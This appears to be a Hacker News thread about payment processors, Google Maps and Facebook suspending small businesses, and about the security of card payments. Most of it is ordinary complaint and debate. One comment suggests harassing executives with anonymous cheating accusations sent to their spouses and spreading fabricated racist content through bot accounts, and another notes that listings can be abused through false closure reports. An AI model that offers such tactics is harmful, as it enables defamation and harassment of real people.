I view it as paying by cash, so the same type of pitfalls exist. I'm not really pushing crypto as the best payment method, just giving the OP possible alternative payment methods they could use. There is a learning curve to using crypto, which I believe reduces the potential of consumers not fully understating the risk of sending payments. Consumers who want the protections should use a credit card to get those.
Coinbase could freeze your ability to process or receive your payments for a dozen random reasons too. False sense of security there, you need self custody.
Have open source self custody merchant tools improves?
Brick and mortar gone online and Web 2.0 services seem pretty left behind for accepting crypto payment. And Web 3’s crypto natives don't care or need purchasing flows.
I wonder what it is that we do differently such that I never hear of these problems from natively European payment methods. E.g. the payment platform iDeal draws directly from your bank account but there is apparently no significant trade in stolen logins. What makes that not as lucrative?
Related, but not strictly the same: a week ago my IBAN (eu-wide bank account number) was used via a Paypal guest account to make payments of 580€, paying through direct debit (Lastschrift).
There is no inherent security at all. Merchants usually send you 1 cent with a 2fa code, in order to verify that you have access to the account.
In my case this was not done apparently, and the scammers got their items. I was able to do something similar to a charge back, but I wonder whether the online store or PayPal will have to eat the loss.
I read about stuff like this every month, but then people (on the internet) tell me there are no uses for blockchains and they're exlusively for scams (yes, scams exists, a lot of them).
Try talking to a local (office close-ish to you) processor or acquirer. You usually need a good amount of transactions to get them interested, but they will have support, they will discuss before taking any measures etc.
In many countries you have a cheap, easy to implement and fast bank to bank for online which is faster, cheaper and more secure. And as such, mostly impossible to chargeback because unless you had a gun to your head, it was you who did the transaction.
In those regions, incentivise those means; give 5% discount for paying like that. We accept those in region where they are available, we also have our IBAN for you to pay directly. Some companies prefer that as they pay all their other invoices that way.
It would be relatively easy to implement in Ireland, but I've only used it once (buying from a shop in Germany). I placed the order on their website, and they gave me an IBAN and a reference number. I did a bank transfer to that account using the reference number they gave me, and they marked the invoice as paid and shipped the product. Simple system, though I'm not sure how they monitored their bank account: it may have been manual. It would work for any company which uses IBANs, which is all SEPA companies and many more besides.
Australia has a system called POLi. This injects a popup into the checkout page of a website which allows you to log into your own bank and do a transfer from there. That works well, and seems quick and easy for the customer.
> as a solo SaaS builder it seems harder and harder these days to have any sort of job security
This overlooks the hard work and risk undertook by the virtuous founders of Paypal and Stripe.
*SBOs love to advocate the virtues of "risk-taking" to defend exploiting others, and the opposite when they find themselves at the other end of the exploitation.
It's a constant fear, and there's no way to avoid using these companies. I'm currently dealing with a bakery business that was suddenly suspended from Google Maps. This is a big deal because it's the main way, by far, that people find us.
7 days ago, boom. Your account has been suspended for not following the business guidelines. The only thing I've updated recently was our hours. It's been listed without problems for about two years.
Of course they don't tell you what the issue is. They just tell you to fix it and then beg them to reinstate you. It takes up to two weeks apparently (7 days so far). And if they decide not to, the only thing you can do is delete the listing, and two years worth of hard earned reviews go up in smoke.
A few days ago one of our staff told me a Korean tourist came in the day before we were suspended and accused us of being fake. I don't know exactly what happened but due to the tourist's limited English nobody could persuade them we were the real location. Or maybe they were looking for somewhere else entirely? Who knows. Apparently they left a negative review, which I can't see while the account is suspended. Probably they reported the location as fake.
So that's it. Two years, over 100 positive reviews sitting at 4.9 stars. Gone because of one confused tourist. Or maybe because I updated the hours. Or maybe an automatic spam check didn't like us.
I sincerely hope that the next round of EU laws tackles this instead of privacy. It's just as big an issue, especially if you're running a small business.
My wife's floristry business has been blocked from being able to access facebook advertising and permanently restricted in how she is able to interact with her customers in part because a bot flagged and suspended her for trading in trading exotic animals. The exotic animal she was accused of trading? Aphelandra Squarrosa - The zebra leaf plant.
There's no way of getting this ban reversed, there's no way of invoking any human to perform a manual review on the ban. It is a permanent restriction that impacts her ability to communicate with her customer base.
> There's no way of getting this ban reversed, there's no way of invoking any human to perform a manual review on the ban. It is a permanent restriction that impacts her ability to communicate with her customer base.
You know you're doing it wrong when the the Ministry of Information in the movie Brazil has better customer service than you do.
Edit: add "the movie" to remove ambiguity.
9 replies →
Getting lawyers involved is one guaranteed way to talk to a human at Facebook. It won't be easy or cheap though, so I can understand why a business like a flower shop wouldn't want to do that.
7 replies →
This is a political problem manifesting as a legal one.
Call your US Senators and Representative. Explain the problem.
Call your State Senators and Representative. Explain the problem.
Contact the FTC and file a complaint.
if you're based in Europe, try framing it as a GDPR issue. Article 16 says that data processors have to rectify data that is inaccurate or incomplete within 1 month. If they don't do that, you can raise it to your national privacy ombudsman as an incident. This being Facebook, there is a chance that they'll act on it.
Be sure to CC privacy@facebook.com and legal@facebook.com
Only issue: not sure that the GDPR applies to companies. And it's a 'pro' account I guess?
3 replies →
Sorry to hear this. Floristry is pretty cut throat with all the shipped direct sites that undercut prices. (Used to work at FTD.com, which bought ProFlowers, a very large flowers-in-a box operation.}
> I sincerely hope that the next round of EU laws tackles this instead of privacy. It's just as big an issue, especially if you're running a small business.
This! Couldn't agree more. I believe this is a much more bigger, huge problem compared to privacy, which is preventable (users can choose not to use a service) but this can take down entire businesses because of data giants' crappy/false alerting systems.
It should be illegal for Google, say, to remove listing without proving, or if that's not possible, if they remove they should legally be forced to compensate for the damage done. (Of course Google is just an example here, applies to any large enough platform)
Maybe then they will take this serious.
> users can choose not to use a service
By that logic you can just not use Google. But that's ridiculous, as ridiculous as the statement that users can choose not to use a service. I believe it's impossible to live in modern society without having an account in FAANG, even harder than a business not having a google maps listing.
53 replies →
Privacy is a choice? That's a new one, I didn't know people had the choice of their data not being leaked or sold by small and big businesses.
We can chew gum and walk at the same time, no need to throw privacy under the bus.
11 replies →
Given that Google handles a tremendous amount of email (not all to gmail.com domains either), and that other companies maintain "shadow profiles" of non-members, or simply track vast numbers of people (credit bureaux and other data-brokers), let alone the vast levels of surveillance baked into the present-day Internet, saying people can simply opt out of services is ... profoundly untrue.
There's not need to pit fairness in business dealings against privacy. Both are wins for the average person.
The problem is that such large platforms work like utilities, but are governed as services
2 replies →
I really am I favor of your suggestion. Next to that my stance is that big companies should be by law be required to have a human representative you can contact, especially in the time of AI.
But then we will face the original problem: prevalence of fake location spam
1 reply →
> I sincerely hope that the next round of EU laws tackles this instead of privacy. It's just as big an issue, especially if you're running a small business.
At least in Germany, you can file for a court order ("Einstweilige Verfügung") against Google - that usually works out and is relatively cheap, a couple hundred euros. Consult a lawyer, I think most EU countries have a similar instrument. Do note, you might have to file for an order both against the Google Europe HQ in Dublin/Ireland and against your country's Google office.
How would this work? Google isn't an official registry, do they have an obligation to list any business?
And the privacy argument is often effectively countered with security concerns, even more so if that is expressly stated so in the ToS.
Just to be clear: I'm 100% on the GP's side, I'm just curious what the Verfügung could do here. In order for the court issue such an order, it needs at least a reasonable legal basis.
11 replies →
Even if you dont want to be listed on google maps, they will sometimes generate a fake listing for you anyhow. I got burned by one of these as a customer, the link for takeout was not actually a site the restaurant was partnered with. I’ve also seen restaurants with similar names url squat these other places.
It seems so bizzare google will publish such information without ever validating it with the business. It must cause a lot of damage and support quite the environment of scammers though.
This happened to a restaurant I go to a lot. Their Maps listing said there was online ordering, but the link went to a site that even had a disclaimer saying they were not actually affiliated with the restaurant. I reported it to Google and they removed the entry, but anyone can make a change and double checking seems to be cursory at best.
> It seems so bizzare google will publish such information without ever validating it with the business.
Why should they? Validation would be expensive, and the false information doesn't hurt Google. Where else are you gonna list?
1 reply →
On the flip side, as an avid Google Maps reviewer they also removed my negative review from a restaurant without any good reason (supposedly the business reported it as being “fake” or something)
It really pissed me off because I wrote a long thoughtful review and mentioned the good aspects of the restaurant too as well as some recommendations, and it’s just completely gone
The worst part is the restaurant is sitting at 4.5 stars despite being quite bad, and the recent low star reviews are all questioning the rating, which is obviously artificial
I've been reading a lot of reports recently about how businesses abuse AirBnb and Google Maps reviews by forcing the companies to remove them on technicalities or by outright lies. I wonder if I should just post any less-than-stellar reviews without any text but with rating only in order to make it harder for them to remove. Thoughts?
I’m at Level 8, how far along are you?
8 replies →
If that happened recently enough, I would guess that your "long thoughtful review" was confused for a ChatGPT fake.
This is also a problem on the customer side. I don’t shy away from leaving bad reviews to businesses that deserve it. These businesses either reply with a passive aggressive doxx like “Hi Or Nornor” when I don’t use my real name anywhere on the internets (including medical-related businesses), or they report the review and my account gets blocked with all my reviews removed.
And then of course there is it a single living human at google you can contact to even find out which review was flagged, why, and what to do about it.
I don’t even read reviews anywhere anymore, they’re all faked or AstroTurfed anyway that they give no indication of anything. What a brave new world.
I encountered the same problem recently. My family member’s business changed location. Updating the Google maps listing caused Google to flag it for not following guidelines and weeks passed with the listing being “under review”.
The solution that ended up working for me was to start paying a few dollars a day for Adwords. For some reason that cleared the issue up the next day. Then, I turned AdWords down to a few bucks a week and then later off entirely.
> The solution that ended up working for me was to start paying a few dollars a day for Adwords. For some reason that cleared the issue up the next day.
Yes, for some reason it cleared up after spending money. I really hope it’s not the norm. Sounds like extortion to me.
1 reply →
Can confirm. This works in more places than one, Reddit too. Reason? When you're a paying customer, you get routed to elevated support staff. They have a higher incentive to help you fix the problem and fast.
I don't hate it, I appreciate it. Better than having no easy recourse. Because I bet if everyone were treated equally, it'd be shitty service for all. Better to toss in a few bucks if it's valuable and get the support (and some ads run).
1 reply →
This sounds like an Mafia movie. Pay up for a little protection and don't let it happen again!
Intentionally or accidentally, it's a great problem for big tech to have. You scramble with everybody else to be on the service and the DDOS crowd, confused tourists and local ruffians take your account offline. Better grovel up to reinstate your honour and pay for protection/added services/more identity validation that doesn't stop the problem from happening. Same thing every big country does, we are all under a "security umbrella".
Honestly, real life advertising needs to make a come back. And localized knowledge of the businesses worth keeping alive, when Google's security algorithm dumps them without administration even knowing it. Eggs all in one basket, was never a good idea.. right?
All business and all government eventually become a racket.
Also, how should a small business deal with fake negative reviews in, say, Play Store? Google does nothing to fix that. As the app developer you know a review from an account that didn't sign-up to your service is fake, especially when it appears at the same time other similar fake reviews do.
This is very sad. It's a disgrace that even physical businesses today depend so much on Google.
If you happen to review few places on Google Map you are holding superpowers. Idk if that works for new accounts too. But yeah, at least if you do some activity then you report a place as closed, they are "checking" it for 1h, then you get the e-mail that the place got removed from Maps.
I use that for good purpose - I fix a lot of invalid information on Google Maps around my home town, and they apply the changes without batting an eye. This is good for society. But I can clearly see how that could be used for abusive purposes.
Companies that don't provide their customers with an easy way to speak with a representative shouldn't be allowed to operate inside the EU.
I feel like you should be able to request a call from their call center rather then be forced to wait on the phone for one. The long wait times to speak to representatives is a cost savings measure.
First saving on having to hire an appropriate level of customer service staff. Second that percentage of people who give up.
It's a feature, not a bug.
I think one of the pixel phone had an option to detect when there was a human on the other end of the line. Definitely made me consider getting it back when I was looking for a new phone.
1 reply →
>I sincerely hope that the next round of EU laws tackles this instead of privacy
why instead?
Well because there's already been a lot of laws passed in that regard and there's already momentum. I don't mean they should stop this momentum, these privacy laws are incredibly important.
I meant the need to start a new front.
Because privacy laws have zero teeth and workarounds are technically easy (or endlessly annoying for zero new outcome, e.g. see cookie popups). If the EU would actually enforce GDPR it would be amazing.
Meanwhile these companies who have essentially became a public utility don’t provide customer support or explanations.
5 replies →
Is it listed on OSM?
If its not you're part of the problem.
Yes of course it is. I put it on both on the same day.
Your comment feels very passive aggressive, FYI. There's no need to make accusations like that.
you get bad service from these companies for the same reason the government generally provides bad service, they are monopolies with no reason to spend more money to improve
I worry about the horrible side effects that would occur from trying to grant that wish. It is always easy to make demands when you aren't the one carrying them out and most people don't think the implications through.
My mind just boggles at the implicit additional bureaucracy, expenses, and slowdowns being cheered for. The kind of mess which results in a system so complex that it has its own "degrees which shouldn't exist" spawned from it like medical billing.
feel free to post a link or add it to your profile and ill leave a good review
Thank you, that's very kind. However, it's not possible even for me to view the listing while it is blocked.
You can blame the evil competitor but the real problem is that credit cards are not the right tool for payments to strangers over the internet.
Every time I do a CC transaction I’m giving a stranger exactly the information they need to do an entirely different, arbitrarily large CC transaction in my name with any merchant. That’s bonkers.
I’ve recently seen more use of Apple Pay via websites. Assuming it works as Apple Pay usually does, this at least is technically more secure (though I don’t like giving Apple more power) since it’s basically an exchange of cryptographically secure/verifiable one time tokens.
PayPal is no one’s favorite but at least if you use that you’re not handing over your CC number. (And yet they seem to lock out tons of merchants, hmm)
Why are we still using credit cards? It’s not great as a consumer either - I have had my card locked for traveling within the same city and spending maybe $20 at a merchant I don’t usually visit. I had it locked because of a $5 web service monthly charge - and I had verified the same charge the two prior months.
> Every time I do a CC transaction I’m giving a stranger exactly the information they need to do an entirely different, arbitrarily large CC transaction in my name with any merchant. That’s bonkers.
You may be surprised to know that, when doing a "conventional" CC transaction, you are most certainly not giving any stranger information that would allow them to perform a transaction in your name on another merchant. What you are doing is providing your card information to a PSP (payment service provider) that has been contracted by the merchant and will provide the merchant with a token with which the merchant can trigger a charge request to your card but only to their own pre-approved acquirer account. The merchant can do nothing else with these tokens.
A breach of the merchant's token database would be embarrassing but harmless. A breach of the PSP's database of card numbers would be bad and inconvenient for the cardholders, sure, but it would be a business-terminating event for the PSP as its PCI DSS [0] compliance would be shattered and it would be unable to operate again.
In summary, ordinary card payments are essentially as secure as Apple Pay. The only difference is that in one case you are trusting a gigatech brand which is very saliently involved in the process but whose side-business in payments has only operated since 2014, while in the other case you are trusting businesses that you may or may not have ever heard of —Adyen? Braintree? WePay? Worldline?— but that have probably been dealing with secure payment processing as their primary or only business for much longer.
[0] https://en.wikipedia.org/wiki/Payment_Card_Industry_Data_Sec...
I think you missed the “over the internet” part. When you do a CC transaction over the internet, you give the merchant your CC number and all the other information needed to make a transaction happen. A legitimate merchant may pass that information directly to a PSP, but you can’t deny you’ve given the merchant the information. Surely you’ve filled out a CC form in a website before?
27 replies →
What prevents me from cloning some product's website and changing the payment form to send me the details instead, which I then submit somewhere else to purchase something online for myself? Not sure why Stripe or PCI is even important here.
(IMO) what GP was arguing for is that we should have a fundamentally asymmetrical form of payment, viz. the information I give for one purchase should not be able to be reused for another purchase, like a one-time token. Imagine if you had to send your private key every time you wanted to purchase something in crypto, for example.
This is correct and the GP is (confidently) talking nonsense.
However the big issue is most normal users would not have the ability to see if they're using an embedded iframe or cross origin JS from Stripe, Braintree, etc.
1 reply →
> You may be surprised to know that, when doing a "conventional" CC transaction, you are most certainly not giving any stranger information that would allow them to perform a transaction in your name on another merchant.
No. In best case, you’re giving your payment details to a PSP. A couple years ago NewEgg had a javascript skimmer on their checkout page that harvested all their customers payment details for months. Obviously anyone with access and intent could do the same for any payment page.
I've used plumbers and dentists where, over the phone, they collect your CC information, sometimes as a deposit before doing work.
Always made me nervous... are they writing it down? Typing it into their home-made software?
1 reply →
> I have had my card locked for traveling within the same city and spending maybe $20 at a merchant I don’t usually visit. I had it locked because of a $5 web service monthly charge - and I had verified the same charge the two prior months.
This happens to me almost every time Skype bills me, and I've been a customer for probably 10+ years with both my bank and Skype, and the billing is regular as clockwork. For at least of half of that time, I've complained about it vocally and customer service can't do anything. Now I think about this every single time I hear "AI-assisted fraud detection", and by extension, "AI-assisted security" and really "AI-assisted XYZ". Without another credit card, I guess I'd simply live in constant fear of being embarrassingly declined totally at random on any/every transaction. It's not like I* know the billing cadence, even though my bank has a decade of history.
Clearly they are simply selling my history to the highest bidder, because they certainly aren't using it to help me. On a related note, ever notice that vanilla "exact substring match" search even in gmail is just as bad as google web search? All these corporations that are allegedly indexing us to "value-add" with some perfect high-resolution consumer model can't even do basic shit despite all the spying. I almost expect* my privacy to be fucked, like I guess hey that's modernity. What never ceases to surprise me lately is how the pretense has kind of dropped and we get nothing in exchange, even petty conveniences.
> This happens to me almost every time Skype bills me, and I've been a customer for probably 10+ years with both my bank and Skype
Why are you still with that bank? Even if you like everything else about them, couldn't you just open an account with another bank for Skype billing? Having more than one account is helpful anyway for avoiding having a single point of failure where you can't buy anything.
Unfortunately we didn't use the contactless change to finally fix this. NFC payments are still stuck in the world where the client doesn't have a way to make the payment themselves so has to trust the payment terminal the merchant puts in front of him with their secret information. The transaction should have been reversed. The merchant should have the dumb side, where they only communicate payment details, and the client's phone should be the one doing verifications and initiating the payment. It's bonkers that this hasn't become standard yet. Even more bonkers that internet payments didn't make the same switch long ago.
at least in this respect the now prevalent UPI (unified payments interface) used throughout India fares better.
each merchant -- even a roadside vendor or a mobile hawker of wares -- displays a QR code that has their payment account details / UPI handle.
Customer uses their own phone and UPI payment app to scan that QR code, look at the merchant details displayed, punch in the amount to pay and authorize the payment using their PIN.
(a variation on this is: hand-held POS terminals display a QR code that also encodes the amount to be paid so that the customer doesn't have to punch in the exact amount).
and since this is a unified protocol the users are not stuck with a single payment app or a single payments processor or a single bank network to transact with each other. QR codes are universal - can be scanned by any UPI app.
I have other reservations about the digital trail this leaves for every petty transaction of your life -- and the small risk of a petty vendor being able to harass you later based on the information you leave in their records.
If we don't trust the government -- this makes us jittery about how much they can track you or even cripple your life by disabling a few key things that you need this all to work smoothly.
Those risks aside,this UPI system has been a boon to ease of transactions (without worrying about handling cash and change) across the country. Net positive with some scope for improving privacy protections.
1 reply →
That would have been nice, but not backwards compatible with millions of POS terminals and payment processing setups out there.
One big advantage of contactless card payments as implemented in most countries is that you can seamlessly introduce it, making it look like a regular chip or even magnetic stripe transaction to the POS and everything behind it.
4 replies →
EMV is in a substantially better position than online credit card payments: the terminal cannot clone a card (though it sees a PIN and card number, it does not see the CVV, so it is not useful for online transactions, and the card contains private keys which are relatively hard to extract. The only remaining hole is creating a magstripe card, but these are becoming rare even in the US). The card does see and verify the transaction. The two main issues are the PIN entry onto the pad (which exposes some information, though with NFC this hole is somewhat removed), and the fact that the payment is still initiated by the terminal, with no way for the user to independently see the transaction amount before authorising the transaction (NFC on a phone can in principle fix this, though in a somewhat annoying manner: it could refuse the transaction the first time, then prompt the user, and accept the next transaction for the same amount).
This is how it works in a lot of places, including everywhere in China and parts of south east Asia. The merchant’s device displays a QR code, which you scan with your phone. The details of the transaction are shown on your screen, and you can select things like where the money should come from, sometimes discounts etc, and then tap to complete the transaction.
2 replies →
> You can blame the evil competitor but the real problem is that credit cards are not the right tool for payments to strangers over the internet.
Granted the entire system needs a revamp, but credit cards are one of the best tools we have to pay strangers right now. Credit card money isn’t your money being spent, and comes with a fraud guarantee. I would rather use a credit card than something linked to my money in a checking account for sketchy transactions.
Yes, it’s a hassle when the card number inevitably gets stolen, but NFC payments, etc are starting to tackle this.
One thing I’ve seen a lot is people misunderstanding credit cards. If you pay them off monthly, you usually get some kind of reward and additionally a huge layer of fraud protection from your personal finances. That being said, I also can’t wait until more secure credit card systems become more prevalent.
In much of the world, the "credit card" payment goes through a pre-paid card. Then you're actually putting your own money on the line, and even if there's a guarantee, it's a pain to actually go through the process of invoking it.
If this is one of the best tools, then I'm really dismayed at the state of payments around the world. SEPA bank transfers are so much better, even if they have other problems.
6 replies →
> you usually get some kind of reward
What kind of reward? I’ve always paid mine off each month and never gotten a reward on any of my ~15 cards.
2 replies →
My cc number is useless without access to my bank account. The hacker would also need to steal my phone and bypass the fingerprint scanner somehow to get in there.
>One thing I’ve seen a lot is people misunderstanding credit cards.
Practically all the credit card haters turn out to not understand credit cards, it's almost hilarious. Are people not taught even the very basic of financial know-how from anyone?
> Why are we still using credit cards? It’s not great as a consumer either
Because the big networks (Mastercard and Visa) as well as the issuer and acquirer banks spend insane amounts of money on advertising and lobbying - even in the EU where payment fees are capped, the cap on CC fees is notably higher than on debit card/SEPA fees, so there is a clear incentive for everyone in the chain to push for credit cards.
Additionally, issuer banks make a ton of money on interest which means they have even more of an incentive to push for CC usage.
And also this reliance on a few payment providers causes the same type of problems as this business have with Google - big businesses trampling yours on a whim, with no real recourse. The problem is actually far worse with payment processors, who are increasingly taking it upon themselves to be an unelected worldwide morality police, deciding which types of commerce shall be legal with their own de facto law
1 reply →
Is it? My bank accounts in two European countries have in the last year transitioned from Visa Credit Cards to Vise Debit cards. Because the banks in both cases wanted about 2.5 euro per month for something that does not provide any value to me. Unfortunately Visa Secure seems to be changing its validation mechanism every 3 months though, which each time is super annoying.
CC in europe require a 2fa confirmation where you recieve usually a notice of the amount you're approving
This is not mandatory by law though and mostly it's up to merchant to decide whatever they require 2FA or not. AFAIK payment processors like Stripe actually let you make 3DS (and whatever it called for MasterCard / AMEX) mandatory.
I guess problem is that in US you'll lose a lot of customers by declining payments without 2FA. Also likes of AMEX use 2FA via email so I guess there could be fraud too.
1 reply →
CC in europe require a 2fa confirmation where you recieve usually a notice of the amount you're approving
How does that work when you buy things in places where you don't have cell service?
Yes, they exist. Even in Europe.
20 replies →
We’re still using credit cards because they severely limit personal liability. Many CC companies give you the ability to have temporary cards with short term expiration linked to your account. However, there is minimal incentives for you to do so.
The credit card company and indirectly the vendors carry much off the cost of fraud. The credit card company spends a lot of resources on preventing this fraud. Introducing a proper solution for online payments would allow them to reduce costs and offer better deals to vendors and consumers. They also are the only participant in this who is a individual participant rather than a group. It seems like this is the ideal setup for credit card companies to introduce innovative solutions. They have the incentive and the leverage, yet it's not happening. What am I missing?
1 reply →
Strong authentication/payment confirmation and strong consumer liability protection are not mutually exclusive.
In the EU, card issuers and merchants are required to use 3DS for e-commerce payments and PIN verification for in-person payments in many circumstances; yet chargebacks are still possible.
We use CC because the infrastructure is there and there is legally mandated (depending on jurisdiction) fraud protection. When you pay with CC, the issuer is potentially on the hook for fraudulent payments, so they are incentivized to provide the protections.
And of course there are many that use CCs for the purpose of a loan to purchase items they can’t currently afford.
Although you're right that Apple Pay is cryptographically verified, you may be surprised to know these two things:
1. you can charge any amount - the amount shown in the Apple Pay UI is arbitrary
2. you can make multiple charges, also of any amount (e.g. for a subscription)
It is tokenized, but practically it's just a card number you can charge like any other card number. It's also typically linked back to the original PAN, so multiple payments can be correlated together with ease
Your payment processor and the network has to trust you if you're reusing the Apple Pay cryptogram for a subscription payment. You _can_ do anything (e.g. you can represent yourself as an open loop transit network reader and get a card number without any authentication from express mode cards!), but the network will not allow you to succeed doing that for very long, if at all.
> Why are we still using credit cards?
Because they're accepted by pretty much everybody and nobody has come up with a system that is any better.
A multi-cryptocurrency payment system would be the perfect solution for online payments but unfortunately nobody has figured out how to solve the double-bullet problem which stands in the way of mass adoption.
Central banks are preparing to launch the digital euro and the digital dollar. Cryptos had their chance and they blew it.
No, it's really not. As a buyer I don't want irreversible transactions to someone anywhere in the world, I want something that if the seller isn't acting fairly (items not as described, not shopping orders, etc) I can lean on to get my money back.
That's why 3D secure exists: https://en.wikipedia.org/wiki/3-D_Secure
Blame your government for not caring enough to have it implemented
I hate 3D secure, it's a way for banks to move the liability and inconvenience to me, their customers. In most implementation, I need to wait for an sms, often that sms takes ages to come.
Then there's a bit of a monopoly with 3d secure implementation by cardinal.js and their solution falls down completely if you have a decent amount of traffic on the site (I have worked on flash sales websites, cardinal js is about as reliable as I can throw my car)
Blaming certain government can get you banned not only from facebook but from real life altogether.
No information given about the actual activities ongoing here so I’ll focus on the service providers behaviour directly.
Given the meteoric rise of companies charging for services with no support of any type available for consumers other than hoping for traction on social media, how do we legislate to basically enforce some alternative to ‘computer says no, just make a new account and hope it doesnt happen again’. This seems like something consumer protections agencies should be all over.
Australia’s consumer protection body is actually quite active in enforcing our rights when dealing with these sorts of things. Does America not have a similar agency or has it been captured by the companies it’s supposed to regulate?
These companies are collecting sizeable profits and part of the way they’re achieving this is by simply disregarding all the support and engagement processes ‘normal’ businesses have to have claiming their scale makes them impossible. That should just not be an acceptable answer as far as consumer remedies are concerned.
Payment processors are a natural monopoly and as such they should be regulated like utilities, i.e. not allowed to deny service without good reason. Unfortunately the government rather likes having a way to destroy the livelihoods of undesirables without any of that pesky due process.
The payment networks (Visa/MC/etc.) may be monopolies but there are ton of processors (Stripe/Paypal/etc.). Sure, all the smaller processors "suck" but somehow they worked before Stripe was founded.
3 replies →
You have hundreds of choices to take credit cards online. You can just go the traditional method and get a merchant account and payment gateway.
1 reply →
Payment processors are not a natural monopoly, especially not online ones
We need some new snappy word to describe what service providers are doing.
I know you could probably say that its just some other existing legal construct which we should just enforce, but the point is that the media needs some snappy new very specific word to talk about to make politicians pay attention.
Things like swatting, phishing, slamming, gaslighting and boofing we all know about and are easy to write articles on with decent enough SEO.
So what is the snappy new 21st century term for this, so that we can complain about it and write blogs and articles about it and demand politicians do something about it?
Every business wishes it could be a vending machine. Strip out all employees and customer service and damn the consequences if your soda gets stuck.
Too many people and businesses have been relying on these vending machines, partially because they have no other choice. Everything has been hollowed out, every store runs on a skeleton crew. You know this if you’ve walked around a store wondering if anyone even works there. I never noticed this until I traveled to other countries and found businesses that actually felt like they wanted to please me instead of feeling like I was expected to be grateful that BigBoxStore (tm) exists.
"Deaf corporations" since they cannot hear, "Divine corporations" since they won't listen to you, "Nosumers" as the opposite of prosumers and a nice play with no-sum (you heard it first here)
2 replies →
Some more brainstorming:
===
"Support Void", "Voiding", "Customer Voiding"
Tossing all customer support requests (and sometimes customers themselves!) into the void.
Pros: Sounds snappy and dramatic. Has humorous resonance with voiding your bowels.
Cons: Meaning not immediately clear. Sounds active when the problem is really more passive.
===
"Customer Neglect", "Customer Disservice", "Customer Ghosting"
Opposite of "customer service."
Pros: Meaning is more obvious because of its relation to Customer Service.
Cons: Not quite as snappy.
1 reply →
Kafkaesque
Does America not have a similar agency
It does, but it's still newish, and faces a lot of opposition from both politicians and businesses.
In 20 or 30 years, once the various lawsuits and codes get sorted out, it might work. But it's still in its toddler phase, and everyone is seeing if they can push the baby over.
The Federal Trade Commission seems relevant. I've not tested them on these "no support; no recourse" situations, but have had good results for other issues.
Anybody thinking of the "Better Business Bureau" should note that the BBB is not a government organisation and behaves more like a Better Extortion Bureau: paying members can keep their good rating by unilaterally declaring a claim has been resolved (often requiring claims to be reasserted multiple times), while non-members or non-paying members cannot even contest claims via the bureau.
We also have an issue of enforcement, I'm not sure if you know... but many, if not all of these behaviors could be acted on with existing legislation. Anti-trust at the federal level and a multitude of state laws on paper make it illegal to do this type of behavior.
The problem is that it's really hard to take action on large corporations. As a consumer, if I wanted to seek remedy for say, false advertising of ingress protection on a phone, it would cost hundreds of thousands of dollars in legal fees. Without a significant war chest it's almost impossible to hold most companies to account as an individual, and the agencies supposed to be enforcing these issues either won't or can't enforce the laws on the books.
The Aussie government has the same new account cycling that corporate culture does. It's just that the gov has call centres and support staff.
Do you think there's any incentive to fix these problems when the constant inconvenience and technical gremlins can be more easily and excitingly solved with biometric IDs and whatever else?
Let's be honest, the Australian government may clamp down on corporations, but it plays the same game and doesn't care for anyone's dissent in the long run.
Not sure if anyone has experimented with this but I wonder if there is a solution but it's just relatively unused. I've heard suing the company (or in most cases, taking them to arbitration) works and often times the company is the one paying for the fees (because that's how arbitration works).
The claim that scale makes support impossible is ridiculous. Just make support a paid service and it'll easily pay for itself and scale proportionally. The will is simply not there
If you are being unethical there are a bunch of things you can do.
I would advise targeting people directly, anonymous letters directed to a spouse with accusations of cheating will help prevent executives from travelling and add a lot of personal stress on their lives, all it costs is a stamp. -- this is especially easy if you live in Sweden; since addresses and living arrangements are public info.
Other things you can do is to fabricate something racist and pay for a few hundred bot accounts to follow any mention of the company or product.
I have had both of these happen to me, and my industry is not very competitive nor am I a famous figure.
I'm sorry to hear that happened to you. :( Sounds horrible.
I hope this attack becomes more popular. I truly do.
Maybe these attacks will finally force regulators to do something about the financial parasites we call "payment processors". Any payment processing system that doesn't act like a public utility is broken and needs fixing.
I think the only digital payment system that comes close to acting like a utility right now is cryptocurrecny which is a sad, sad state of affairs.
OP: While not a complete solution, you might be able to partially mitigate this by allowing customers to pay you in other forms (e.g aforementioned cryptocurrency, bank transfers). That's what the porn industry and other legal businesses end up doing when they inevitably find themselves in your position.
If your customers want your product badly enough, a small fraction of them will learn how to use these payment methods. You'll have to learn to survive on those alone.
Pix, the Brazilian payment system, is basically a utility, and payers authorize the payment rather than the payee. It has very little friction, everyone uses it. It does require working internet.
I feel that Algorand (I'm not a holder anymore) was positioned to work as such but would require all the parts to make it successful. The 0.001 ALGO transaction fee cuts down on silly transactions while making 0.1 ALGO transactions possible. It also allows trading in stablecoins or CBDCs as they are enabled. It can complete transactions in milliseconds and moderately-sized participants can easily help maintain the whole network. It never gained traction, however, probably because it isn't a good HODL.
Why is it sad? I truly don’t get it, people on HN will say they are somewhat libertarian, pro decentralization, anti corporate oligopolies, but then use their dying breath to say “crypto has no use case”. Yet while AI took nearly 70 years to find its footing, in just 10 years crypto (currencies) has already found inroads into many areas as a nascent technology that has massive potential to solve some of our biggest problems.
I truly think it’s one of those cases where the “wrong/dumb” people jumped onto it (alongside scammers) and so it became poisoned to the right/smart ones. But we should be way better than that! Is it really so hard for people to separate good from bad?
It absolutely bowls me over to see this lack of ability to discuss it carefully around here so consistently. So many potential amazing conversations totally shunted by the absolute need to turn it tribal.
> Is it really so hard for people to separate good from bad?
If you mean "HN people", then probably no; but if you mean more generalized "people", then definitely yes. Unfortunately, your customers are much more likely from the latter group.
Also, being in a sad state doesn't really mean it "has no use case", right?
1 reply →
As someone who worked in France for a medium-ish size media agency, we had something similar happening to our google adwords account... and it took ~2 weeks for our legal studio to get it back with direct support from google.
Afaik it mostly took them to basically write a few legal letters and telling them "our legal representatives would be glad to meet you at your offices at Google France and discuss such unfortunate issue and so and so" - they basically went "how about no" and restored the account.
Laywer fees weren't particularly cheap (in the range of 2500-5000€) but still well below the money we were losing.
Is this not an option for US-based businesses? I have heard similar horror stories like the one on the OP a few times already but I've rarely seen them pursue a similar path.
>Is this not an option for US-based businesses?
It is absolutely an option. Some people simply choose not to pursue it for many reasons ranging from financial, to a matter of principal, effort required, or any other number of reasons.
It is an option.
You'll notice those stories rarely include "and I talked to my lawyer"
> 10 year relationship with Paypal and 7 year relationship with stripe
Not that the author is implying this, but don’t ever make the mistake of thinking that these numbers ever matter. It’s not 1973 and you don’t shake hands with your banker.
The only number that matters is the number of dollars going through Stripe or PayPal because of your business.
Further, the $500k number is absolutely nothing that stripe cares about. They only take a fraction of
